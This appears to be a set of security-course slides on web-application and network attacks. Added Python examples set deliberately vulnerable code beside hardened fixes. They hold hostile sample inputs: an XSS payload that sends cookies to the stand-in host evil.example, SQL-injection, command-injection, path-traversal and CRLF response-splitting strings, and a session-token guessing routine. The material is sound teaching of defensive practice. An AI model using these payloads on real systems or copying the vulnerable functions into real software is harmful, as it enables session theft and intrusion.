Chapter 3 - Application & Networking-Based Attacks
2 ITIS 412
Conceptual Networked Computer System
Server-Side Web Application Attacks
Content provided for users who are “surfing the Web” is
generated by a software application running on a server
In providing web services to clients, web servers also
expose those same services to attackers
An important characteristic of server-side web applications is that they
create dynamic content based on input from the user
Server-Side Web Application Infrastructure
Securing Web Applications
Securing server-side web applications often considered
more difficult than protecting other systems
Traditional network security devices cannot always block
web application attacks because many of them ignore the
content of HTTP traffic, which is the vehicle for web
application attacks
Zero Day Attacks
Many web application attacks (as well as other application
attacks) exploit previously unknown vulnerabilities
Zero day attacks - Exploit previously unknown
vulnerabilities so victims have no time to prepare or
defend
Common Application Attacks
Many server-side web application attacks target the input
that the applications accept from users
Common web application attacks:
Cross-site scripting
SQL injection
XML injection
Command injection/directory traversal
Cross-Site Scripting
Not all attacks on websites are designed to steal content or
deface it
Some attacks use web server as a platform to launch attacks on
other computers that access it
Cross-site scripting (XSS) - Injects scripts into the content served
by a web application so that they execute in the browsers of
unsuspecting clients
It typically allows attackers to hijack other users' online
accounts on the affected website.
Many web applications are designed to customize content for
user by taking what user enters and then displaying that input
back to user
Cross-site scripting attacks are commonly divided into two types:
stored and reflected.
Cross-Site Scripting (XSS) Attacks
XSS targets the users of the web application; they, rather than the
server, are the ones at risk.
One of the most frequent targets is websites that allow users
Stored XSS Attack Example
While browsing an e-commerce website, the attacker posts a
comment containing an HTML tag (such as a script tag) in the
site's comments section.
The comment is stored by the server and becomes a permanent
part of the page, so every browser that opens the page parses
the embedded tag along with the rest of the source code and
executes it.
Stored XSS Attack
What Is Reflected Cross-Site Scripting?
It is an attack vector that arises when data is copied from a
request and echoed into the application's immediate
response in an unsafe way.
An attacker can use the vulnerability to construct a request
that will cause JavaScript code (supplied by the attacker)
to execute within the user's browser.
The attacker-supplied code can perform a wide variety of
actions, such as stealing the victim's session token or login
credentials, performing arbitrary actions on the victim's
behalf, and logging their keystrokes.
Reflected XSS Attack Example
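The stored and reflected cases described above differ only in where the untrusted string comes from (a saved comment versus a request parameter); the underlying defect is the same, so one added example covers both. This is illustrative code written for this page, not code from the slides; the attacker payload, the page fragments and the helper names are constructed for the demonstration.

```python
import html
import re

# Constructed attacker input: the same string works as a stored payload (posted into a
# comment) and as a reflected payload (placed in a search parameter of a crafted link).
ATTACKER_INPUT = "<script>new Image().src='https://evil.example/?c='+document.cookie</script>"


def render_comment_vulnerable(comment: str) -> str:
    """Deliberately vulnerable (stored XSS): the stored comment is concatenated into the
    page as-is, so a <script> posted by one user runs in every other user's browser."""
    return f'<div class="comment">{comment}</div>'


def render_search_vulnerable(query: str) -> str:
    """Deliberately vulnerable (reflected XSS): the request parameter is echoed straight
    back into the response."""
    return f"<p>Results for {query}</p>"


def render_comment_safe(comment: str) -> str:
    """Hardened: HTML-encode the untrusted value before placing it in an HTML text context,
    so the browser shows the tag as text instead of executing it."""
    return f'<div class="comment">{html.escape(comment, quote=True)}</div>'


def render_search_safe(query: str) -> str:
    """Hardened reflected case: same encoding, applied at output time."""
    return f"<p>Results for {html.escape(query, quote=True)}</p>"


_SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def has_live_script(page: str) -> bool:
    """Crude check used only to make the difference visible: does the rendered page
    contain a real <script> tag (as opposed to the inert text &lt;script&gt;)?"""
    return _SCRIPT_TAG.search(page) is not None


if __name__ == "__main__":
    for label, fn in [("stored/vulnerable", render_comment_vulnerable),
                      ("stored/safe", render_comment_safe),
                      ("reflected/vulnerable", render_search_vulnerable),
                      ("reflected/safe", render_search_safe)]:
        print(f"{label:22} live script: {has_live_script(fn(ATTACKER_INPUT))}")
```

html.escape is the correct encoding only for HTML text and quoted-attribute contexts. A value placed inside a JavaScript string, a URL or a CSS rule needs the encoding for that context, and a Content-Security-Policy that forbids inline script is the usual defence in depth when an encoding is missed.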
SQL Injection
SQL (Structured Query Language) - Used to manipulate
data stored in relational database
SQL injection - Targets SQL databases by introducing
malicious commands through an application's input
SQL injection is a code injection technique, used to attack
data-driven applications, in which malicious SQL statements are
inserted into an entry field so that the database executes them
(e.g. to dump the database contents to the attacker).
SQL Injection Statements
Forgotten Password Example
Attacker enters an incorrectly formatted e-mail address
The error response lets the attacker know whether input is
being validated
Attacker enters a SQL fragment in the e-mail field
The statement is processed by the database
Example statement (everything after the opening quote is
supplied by the attacker):
SELECT fieldlist FROM table WHERE
field = 'whatever' or 'a'='a'
Because 'a'='a' is always true, the result is that all user
e-mail addresses are returned
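The forgotten-password query above, run live against a small SQLite table so the difference between string concatenation and a bound parameter is visible. This is an added example written for this page, not code from the slides; the table, its three rows and the function names are constructed for the demonstration.

```python
import sqlite3
from typing import List


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the site's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (email, password_hash) VALUES (?, ?)",
        [("alice@example.com", "h1"), ("bob@example.com", "h2"), ("carol@example.com", "h3")],
    )
    return conn


def lookup_email_vulnerable(conn: sqlite3.Connection, email: str) -> List[str]:
    """Deliberately vulnerable: the user-supplied address is pasted into the SQL text,
    so a quote character in the input changes the structure of the query."""
    sql = f"SELECT email FROM users WHERE email = '{email}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_email_safe(conn: sqlite3.Connection, email: str) -> List[str]:
    """Hardened: the value is bound as a parameter; the driver sends it as data, so it can
    only ever be compared against the column, never parsed as SQL."""
    return [row[0] for row in conn.execute("SELECT email FROM users WHERE email = ?", (email,))]


# The slide's payload: the closing quote ends the literal, then a tautology is appended.
INJECTION = "whatever' or 'a'='a"

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable:", lookup_email_vulnerable(conn, INJECTION))   # every address
    print("safe      :", lookup_email_safe(conn, INJECTION))         # nothing matches
```

Note that the vulnerable function still only leaks rows because the tautology widens the WHERE clause; sqlite3's execute() refuses stacked statements, so a payload ending in "; DROP TABLE users" would fail here but not necessarily on a driver that allows multiple statements.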
XML (Extensible Markup Language)
Markup language - Method for adding annotations (or
comments) to text
Example is HTML:
Uses tags surrounded by brackets
Instructs browser to display text in specific format
XML (Extensible Markup Language):
Carries data instead of indicating how to display it
No predefined set of tags
Users define their own tags
XML Attack
Directory Traversal/Command Injection
Web server users are typically restricted to the web server's
root (document) directory
Users may be able to access subdirectories below it but not
parallel or higher-level directories
This helps to protect sensitive files
Directory Traversal
Directory traversal is an HTTP attack that allows attackers to
access restricted directories and files, and in some cases execute
commands, outside of the web server's root directory.
The goal of this attack is to use an affected application to
gain unauthorized access to the file system. It exploits
insufficient validation of user-supplied file paths.
It uses malformed input (such as ../ sequences) or takes
advantage of a vulnerability to move from the root directory to
restricted directories
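A file-serving routine with and without the check that keeps the resolved path inside the web root, as an added example written for this page (not code from the slides). The directory layout, file contents and function names are constructed; the only assumption is a web root directory with a sensitive file one level above it.

```python
import os
import tempfile


def build_demo_tree() -> str:
    """Constructed layout: <base>/htdocs is the web root, <base>/secret.txt sits outside it."""
    base = tempfile.mkdtemp()
    root = os.path.join(base, "htdocs")
    os.makedirs(root)
    with open(os.path.join(root, "index.html"), "w") as f:
        f.write("<h1>hello</h1>")
    with open(os.path.join(base, "secret.txt"), "w") as f:
        f.write("db password")
    return root


def serve_file_vulnerable(web_root: str, requested: str) -> bytes:
    """Deliberately vulnerable: the client-supplied path is joined onto the web root and
    opened without checking where the result ends up, so "../secret.txt" walks out."""
    path = os.path.join(web_root, requested)
    with open(path, "rb") as f:
        return f.read()


def serve_file_safe(web_root: str, requested: str) -> bytes:
    """Hardened: resolve symlinks and ".." first, then refuse any path whose canonical
    form is not under the canonical web root. An absolute `requested` is also caught,
    because os.path.join discards the root in that case and commonpath then differs."""
    root = os.path.realpath(web_root)
    path = os.path.realpath(os.path.join(root, requested))
    if os.path.commonpath([root, path]) != root:
        raise PermissionError(f"path escapes web root: {requested!r}")
    with open(path, "rb") as f:
        return f.read()


if __name__ == "__main__":
    root = build_demo_tree()
    print(serve_file_vulnerable(root, "../secret.txt"))   # leaks the secret
    try:
        serve_file_safe(root, "../secret.txt")
    except PermissionError as e:
        print("blocked:", e)
```

The check must run on the fully decoded path: a server that compares against the raw URL would miss "%2e%2e/" and, on Windows, "..\\". Resolving with realpath before comparing is what makes both the encoded and the symlink variants fall through to the same decision.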
Directory Traversal Attack
Command injection
Command injection - An attack whose goal is execution of
arbitrary commands on the host operating system via a
vulnerable application.
A command injection attack occurs when an attacker supplies
input that a vulnerable web application uses to build and
execute a system-level command.
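The classic shape of this bug is a "ping this host" feature that builds a shell command line from the host name. Below, echo stands in for ping so the example runs without network access; the payload, the hostname pattern and the function names are constructed for this page, and none of this is code from the slides.

```python
import re
import subprocess

# Conservative hostname allow-list: letters, digits, dots and hyphens only.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")

# Constructed attacker input: the ';' ends the intended command and starts a second one.
PAYLOAD = "example.com; echo INJECTED"


def echo_host_vulnerable(host: str) -> str:
    """Deliberately vulnerable: the value is spliced into a command string that a shell
    parses, so ; | && $( ) and backticks in the input are interpreted as syntax."""
    out = subprocess.run("echo " + host, shell=True, capture_output=True, text=True)
    return out.stdout


def echo_host_no_shell(host: str) -> str:
    """No shell involved: the argument list goes straight to execve, so the whole payload
    is one literal argument to echo and nothing is injected. This alone stops the shell
    metacharacter problem, but not arguments the target program itself interprets."""
    out = subprocess.run(["echo", host], shell=False, capture_output=True, text=True)
    return out.stdout


def echo_host_safe(host: str) -> str:
    """Hardened: validate against an allow-list first, then avoid the shell entirely."""
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"invalid hostname: {host!r}")
    return echo_host_no_shell(host)


if __name__ == "__main__":
    print("shell=True :", repr(echo_host_vulnerable(PAYLOAD)))   # two lines, INJECTED ran
    print("arg list   :", repr(echo_host_no_shell(PAYLOAD)))     # one line, literal text
    try:
        echo_host_safe(PAYLOAD)
    except ValueError as e:
        print("rejected   :", e)
```

Passing an argument list rather than a string is the structural fix; the allow-list is still worth keeping because a value such as "-h" or "--output=/etc/passwd" is not a shell problem but can still change what the invoked program does.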
Drive-By Download
Drive-by download:
Client computer is compromised simply by viewing a Web
page
Attackers first compromise a vulnerable Web server and inject
content into the pages it serves
Attackers craft a zero-pixel frame (iframe) to avoid visual
detection
The frame embeds a second HTML document inside the main document
The client's browser loads that document and runs the malicious
script it contains
The script instructs the computer to download malware
HTTP Header
HTTP header consists of fields that characterize data
being transmitted
Header fields are comprised of:
Field name
Colon
Field value
Example: Content-Length: 49
HTTP header field names and values may be any
application-specific strings, but core set standardized by
Internet Engineering Task Force (IETF)
HTTP Header Fields
Header Manipulation
HTTP header manipulation - Attack that modifies HTTP
headers
HTTP header manipulation is not an attack in itself but rather a
vehicle through which other attacks, such as XSS, can be
launched.
HTTP header manipulation allows an attacker to pass
malicious instructions from the attacker's own malicious website,
or through an infected site, to the web browser via HTTP
headers
HTTP Header Attacks
Examples of HTTP header attacks:
Referer - Attacker can bypass security checks by modifying the
Referer field to hide the fact that the request came from another site
Accept-Language - Because some web applications pass the
contents of this field directly to a database, an attacker can
inject a SQL command by modifying the header
Response splitting - Inserting a CRLF in an HTTP
header can give attackers control of the remaining
HTTP headers and body of the response
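Response splitting from the last bullet, shown end to end: a redirect handler that copies a client-controlled value into the Location header, a CRLF payload that turns one response into two, and a small parser that models how a browser would consume the resulting byte stream. This is an added example written for this page, not code from the slides; the payload, the parser and the function names are constructed.

```python
from typing import Dict, List


def _serialize_redirect(location: str) -> bytes:
    """Builds the raw 302 response the server would put on the wire."""
    raw = f"HTTP/1.1 302 Found\r\nLocation: {location}\r\nContent-Length: 0\r\n\r\n"
    return raw.encode("latin-1")


def build_redirect_vulnerable(location: str) -> bytes:
    """Deliberately vulnerable: the redirect target comes from the request and is copied
    into the header unchecked, so CR LF inside it ends the header and starts new lines."""
    return _serialize_redirect(location)


def build_redirect_safe(location: str) -> bytes:
    """Hardened: refuse any header value containing the line-terminator bytes."""
    if "\r" in location or "\n" in location:
        raise ValueError("CR/LF not allowed in header values")
    return _serialize_redirect(location)


def parse_responses(raw: bytes) -> List[Dict]:
    """Minimal model of a browser reading a stream: each message is a status line,
    headers up to a blank line, then Content-Length bytes of body. Parsing stops at the
    first leftover that does not look like a status line."""
    messages = []
    pos = 0
    while raw.startswith(b"HTTP/", pos):
        head_end = raw.index(b"\r\n\r\n", pos)
        lines = raw[pos:head_end].decode("latin-1").split("\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        body_start = head_end + 4
        body_len = int(headers.get("content-length", "0"))
        messages.append({"status": lines[0], "headers": headers,
                         "body": raw[body_start:body_start + body_len]})
        pos = body_start + body_len
        while raw.startswith(b"\r\n", pos):   # tolerate stray blank lines between messages
            pos += 2
    return messages


# Constructed attacker value for the redirect parameter: it closes the 302, then supplies
# a complete second response whose body the browser will render as the attacker's page.
SPLIT_PAYLOAD = (
    "/home\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 25\r\n"
    "\r\n"
    "<script>alert(1)</script>"
)

if __name__ == "__main__":
    for m in parse_responses(build_redirect_vulnerable(SPLIT_PAYLOAD)):
        print(m["status"], m["headers"], m["body"])
```

The injected second response is what makes splitting dangerous: it is served from the trusted origin, so the script in it runs with that site's cookies, and a cache between server and client may store it as the legitimate /home page. Rejecting CR and LF in header values (as most modern frameworks already do) closes the hole at its source.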
Cookies
Cookies - Store user-specific information on user’s
local computer
Web sites use cookies to identify repeat visitors
Examples of information:
Travel Web sites may store user’s travel itinerary
Personal information provided when visiting a site
Only Web site that created a cookie can read it
Types of Cookies
First-party cookie - Cookie created by the Web site the user is
currently visiting
Third-party cookie - Site advertisers (third parties) place
cookie to record user preferences
Session cookie - Stored in RAM and expires when
browser is closed
Persistent cookie - Recorded on computer’s hard drive
and does not expire when browser closes
Locally Shared Object (LSO)
Locally shared object (LSO) or Flash cookie - named
after the Adobe Flash player
Different from regular cookies:
Can store more complex data
Stores up to 100 KB of data from a website (25 times the data
of a regular cookie)
Cannot be deleted through the browser's normal
configuration settings
Saved in multiple locations on the hard drive
Can be used to reinstate regular cookies that the user
deleted or blocked
(Adobe Flash Player reached end of life at the end of 2020, so
LSOs are now mainly of historical interest)
Risks of Cookies
Cookies have security and privacy risks
First-party cookies can be stolen and used to impersonate
the user
Third-party cookies can be used to track the browsing or
buying habits of a user
When multiple websites are serviced by a single
marketing organization, cookies can be used to track
browsing habits across all of that organization's client sites
Attachments
Attachments - Files that are coupled to email messages
Malicious attachments commonly used to spread viruses,
Trojans, and other malware when opened
Many users routinely open any email attachment they receive,
even one from an unknown sender
Attackers often include information in the subject line that
entices even reluctant users to open the attachment, such
as a current event
Session Token
User accessing secure web app needs to be verified to
prevent an imposter from “jumping in” to interaction
Session token - Verification through random string
assigned to interaction between user and web application
currently being accessed (session)
Web application server assigns a unique session token
Each subsequent request from user’s web browser to web
application contains session token verifying user identity
Session Hijacking
Session hijacking - Attacker impersonates the user by
presenting the user's session token
Attacker can attempt to obtain session token:
Use XSS or other attacks to steal the session token
cookie from the victim’s computer
Eavesdropping on the transmission
Guessing the session token (successful if generation of
session tokens not truly random)
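The third theft path above (guessing) is only practical when the token is derived from something the attacker can narrow down. The added example below, written for this page and not taken from the slides, mints tokens two ways, replays a deliberately weak generator over a window of login times the way an attacker would, and shows the cookie attributes that blunt the first two theft paths. The session store, the fixed clock value and all function names are constructed.

```python
import random
import secrets
from typing import Dict, Optional

NOW = 1_700_000_000   # constructed fixed clock (seconds) so the demo is repeatable


def weak_token(issued_at: int, user_id: int) -> str:
    """Deliberately weak: seeded from the login second and the user id. Both are
    knowable, so anyone can regenerate the token once they guess the second."""
    rng = random.Random(issued_at * 1_000_003 + user_id)
    return f"{rng.getrandbits(64):016x}"


def strong_token() -> str:
    """Hardened: 32 bytes from the OS CSPRNG, unrelated to anything an attacker can observe."""
    return secrets.token_urlsafe(32)


def login(store: Dict[str, int], user_id: int, issued_at: int, weak: bool) -> str:
    """Server side: mint a token for the user and record it as a live session."""
    token = weak_token(issued_at, user_id) if weak else strong_token()
    store[token] = user_id
    return token


def hijack_by_guessing(store: Dict[str, int], victim_id: int, now: int, window: int) -> Optional[str]:
    """Attacker side: regenerate the candidate token for every second in the last `window`
    seconds and try each against the server (modelled here as a lookup in the store).
    Succeeds against weak_token; against strong_token the candidates never match."""
    for t in range(now, now - window, -1):
        candidate = weak_token(t, victim_id)
        if store.get(candidate) == victim_id:
            return candidate
    return None


def session_cookie(token: str) -> str:
    """Set-Cookie line with the flags that address the other two theft paths: HttpOnly
    keeps script (XSS) from reading it, Secure keeps it off plaintext HTTP (eavesdropping),
    SameSite=Strict stops it riding along on cross-site requests."""
    return f"Set-Cookie: session={token}; Path=/; HttpOnly; Secure; SameSite=Strict"


if __name__ == "__main__":
    weak_store: Dict[str, int] = {}
    victim_token = login(weak_store, 42, NOW - 90, weak=True)   # victim logged in 90 s ago
    print("guessed:", hijack_by_guessing(weak_store, 42, NOW, window=600) == victim_token)
    strong_store: Dict[str, int] = {}
    login(strong_store, 42, NOW - 90, weak=False)
    print("guessed:", hijack_by_guessing(strong_store, 42, NOW, window=600))
    print(session_cookie(strong_token()))
```

Ten minutes of login window is 600 candidates, which any client can try in seconds; a 256-bit token from secrets has no such window, so there is nothing to enumerate. Rotate the token after login and on privilege change so a token captured before authentication is worthless afterwards.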
Session Hijacking Attack
Plug-Ins and Add-Ons
Tools can be added to enhance user’s interaction with
website through web browser
Plug-in - Third-party library (Java, Adobe Flash player,
Apple QuickTime, Adobe Acrobat Reader) that attaches
to web browser and can be embedded inside a webpage
(but affects only specific page)
Add-ons or extensions - Tools that add functionality to
the web browser itself
Malicious Add-Ons
Attackers can create malicious add-ons to launch attacks
against user’s computer
ActiveX - Set of rules for how applications under the
Microsoft Windows operating system should share
information
ActiveX controls (add-ons) - Specific way of
implementing ActiveX and are sometimes called ActiveX
applications
ActiveX controls can be invoked from webpages through
the use of a scripting language or directly by HTML
command
Impartial Overflow Attacks
“Impartial” attacks can target either server or client
Many of these attacks designed to “overflow” areas of
memory with instructions from the attacker
Types of attacks:
Buffer overflow attacks
Integer overflow attacks
Arbitrary/remote code execution attacks.
Buffer Overflow Attack
Buffer overflow attack - Process attempts to store
data in RAM beyond boundaries of fixed-length
storage buffer
Data overflows into adjacent memory locations
Attacker can change “return address” of memory
location of code and redirect to memory address
containing malware code
Buffer Overflow Attack
Integer Overflow
Integer overflow - Condition occurs when result of
arithmetic operation (addition or multiplication)
exceeds the maximum size of the integer type used to
store it
When overflow occurs, the interpreted value then
wraps around from maximum value to minimum
value
Integer Overflow Attack
Example:
8-bit signed integer has a maximum value of 127 and a
minimum value of -128
If the value 127 is stored in a variable and 1 is added to
it, the sum exceeds the maximum value for this integer
type
Wraps around to become -128.
Integer overflow attack - Attacker changes value of
variable to something outside the range the
programmer had intended by using an integer
overflow
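The 8-bit wraparound above, and the way an attacker turns it into a bypass: a length check written as offset + length <= size is sound in unbounded arithmetic but wraps in the 32-bit unsigned arithmetic a C program would use. The added example below (written for this page, not from the slides) emulates both widths in Python, whose own integers never overflow; the buffer size, the payload length and the function names are constructed.

```python
UINT32_MAX = 0xFFFFFFFF


def to_int8(value: int) -> int:
    """What an 8-bit signed variable actually holds after storing `value`."""
    return ((value + 128) % 256) - 128


def to_uint32(value: int) -> int:
    """What a 32-bit unsigned variable actually holds after storing `value`."""
    return value & UINT32_MAX


def bounds_check_vulnerable(offset: int, length: int, buffer_size: int) -> bool:
    """Deliberately vulnerable, evaluated as 32-bit unsigned code would: the sum
    offset + length wraps past 2**32, so a huge attacker-chosen length can pass."""
    return to_uint32(offset + length) <= buffer_size


def bounds_check_safe(offset: int, length: int, buffer_size: int) -> bool:
    """Hardened: rearranged so no intermediate can wrap. Once offset is known to be
    within the buffer, buffer_size - offset cannot underflow and length is compared
    directly against the space that actually remains."""
    if offset > buffer_size:
        return False
    return length <= buffer_size - offset


# Constructed attacker values: with offset 16, a length of 2**32 - 16 makes the sum
# exactly 2**32, which wraps to 0 and sails under any buffer size.
BUFFER_SIZE = 1024
ATTACK_OFFSET = 16
ATTACK_LENGTH = (1 << 32) - 16

if __name__ == "__main__":
    print("127 + 1 in int8 =", to_int8(127 + 1))
    print("vulnerable accepts attack:", bounds_check_vulnerable(ATTACK_OFFSET, ATTACK_LENGTH, BUFFER_SIZE))
    print("safe accepts attack      :", bounds_check_safe(ATTACK_OFFSET, ATTACK_LENGTH, BUFFER_SIZE))
```

In C the same fix is usually written with the subtraction on the trusted side (len > size - off) or with the compiler's checked-arithmetic builtins (__builtin_add_overflow); the point is that the value the attacker controls must never be an operand of an addition whose result is what gets compared.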
Arbitrary/Remote Code Execution
Arbitrary/remote code execution - Allows attacker to
run programs and execute commands on another (remote)
computer
Once under the attacker’s control, computer can perform
virtually any command from the attacker
Arbitrary/remote code execution attacks often take
advantage of malicious attachments like Microsoft Visio
file or PDF file
Network Attacks
Attackers place high priority on targeting networks
Exploiting single vulnerability may expose hundreds
or thousands of devices to an attacker
Types of attacks that target a network or network
process:
Denial of service
Interception
Poisoning
Attacks on access rights
Denial of Service (DoS)
Denial of service (DoS) - Attempts to prevent system
from performing normal functions
Distributed denial of service (DDoS) - Uses thousands of
zombie computers in a botnet
Ping flood attack - Ping utility used to send a large number
of ICMP echo request messages that overwhelm the server
Smurf attack - ICMP echo request sent to a network's broadcast
address with the originating address changed (spoofed) to the
target's, so every computer on the network replies to the target
as if it had asked for a response
SYN Flood Attack
SYN flood attack - Takes advantage of procedures for
establishing connection
Attacker sends SYN segments in IP packets to the server but
spoofs the source address of each packet to addresses that
do not exist or cannot be reached
Server replies with SYN-ACK and continues to wait for the final
ACK (which is not coming) while receiving more false requests
and keeping more half-open connections in its backlog
Server ultimately runs out of resources and can no longer
respond to legitimate requests
SYN Flood Attack
Interception
Man-in-the-middle - Interception of legitimate
communication, optionally forging a fictitious response to
the sender
A passive attack records the transmitted data; an active attack
alters the contents of the transmission before sending it to the recipient
Replay - Similar to passive man-in-the-middle attack
Replay makes a copy of the transmission before sending it
to the recipient for use at a later time (the man-in-the-
middle replays it)
ARP Poisoning
ARP poisoning
Attacker sends forged ARP replies so that the victim's ARP cache
maps an IP address (such as the default gateway's) to the
attacker's MAC address, redirecting the victim's traffic to a
different computer
Attacks From ARP Poisoning
DNS Poisoning
Domain Name System - Current basis for name
resolution to IP address
DNS poisoning - Substitutes a false IP address in a name
resolution so that the computer is redirected to another device
Two locations for DNS poisoning:
Local host table
External DNS server
Sample HOSTS file
DNS Poisoning
Attacks on Access Rights
Privilege escalation - Exploiting a software vulnerability or a
missing authorization check to gain access to restricted data
or functions
Two types of privilege escalation:
Vertical privilege escalation - User with lower privilege gains
access to functions reserved for higher-privilege users
Horizontal privilege escalation - User with restricted
privileges accesses the restricted data or functions of a
different user with similar privileges
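Both escalation types usually come down to one missing or misplaced authorization check. The added example below (written for this page, not from the slides) shows the two defects side by side with their fixes: an object read that never compares the owner with the caller (horizontal), and an admin action that trusts a role flag carried in the request rather than the server-side session (vertical). The user records, the invoice table and all names are constructed.

```python
from dataclasses import dataclass
from typing import Dict


@dataclass(frozen=True)
class User:
    """Identity as established by the server-side session; never built from request data."""
    id: int
    role: str   # "user" or "admin"


# Constructed records: invoice id -> id of the user who owns it
INVOICES: Dict[int, int] = {101: 1, 102: 2}


def read_invoice_vulnerable(actor: User, invoice_id: int) -> int:
    """Horizontal escalation: being logged in is the only check, so user 1 reads
    user 2's invoice just by changing the id in the URL."""
    return INVOICES[invoice_id]


def read_invoice_safe(actor: User, invoice_id: int) -> int:
    """Hardened: the record's owner must be the caller (or the caller must be an admin).
    Unknown ids get the same error so existence cannot be probed."""
    owner = INVOICES.get(invoice_id)
    if owner is None or (owner != actor.id and actor.role != "admin"):
        raise PermissionError(f"user {actor.id} may not read invoice {invoice_id}")
    return owner


def delete_user_vulnerable(request: Dict[str, str]) -> bool:
    """Vertical escalation: the role comes from the request (a hidden form field or a
    client-editable cookie), so any user can send role=admin."""
    if request.get("role") != "admin":
        raise PermissionError("admin only")
    return True


def delete_user_safe(actor: User, request: Dict[str, str]) -> bool:
    """Hardened: the role is read from the authenticated session, the request is ignored."""
    if actor.role != "admin":
        raise PermissionError("admin only")
    return True


if __name__ == "__main__":
    alice = User(id=1, role="user")
    print("horizontal:", read_invoice_vulnerable(alice, 102))          # leaks owner 2
    print("vertical  :", delete_user_vulnerable({"role": "admin", "target": "2"}))
```

The safe variants are deliberately boring: ownership and role are looked up on the server for every request, and the request can name the object but never its permissions.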
Transitive Trust
Transitive - A relation with the property that if the
relation exists between A and B, and also between B and C,
then it exists between A and C
Transitive trust - If Alice trusts Bob, and Bob trusts
Carol, then Alice trusts Carol
Transitive Access
Transitive trust can result in transitive access: System 1
can access System 2, and because System 2 can access
System 3, then System 1 can access System 3
Intention may not be for System 1 to access System 3, but
instead for System 1 to be restricted to accessing only
System 2
Inadvertent and unauthorized access can result in serious
security risks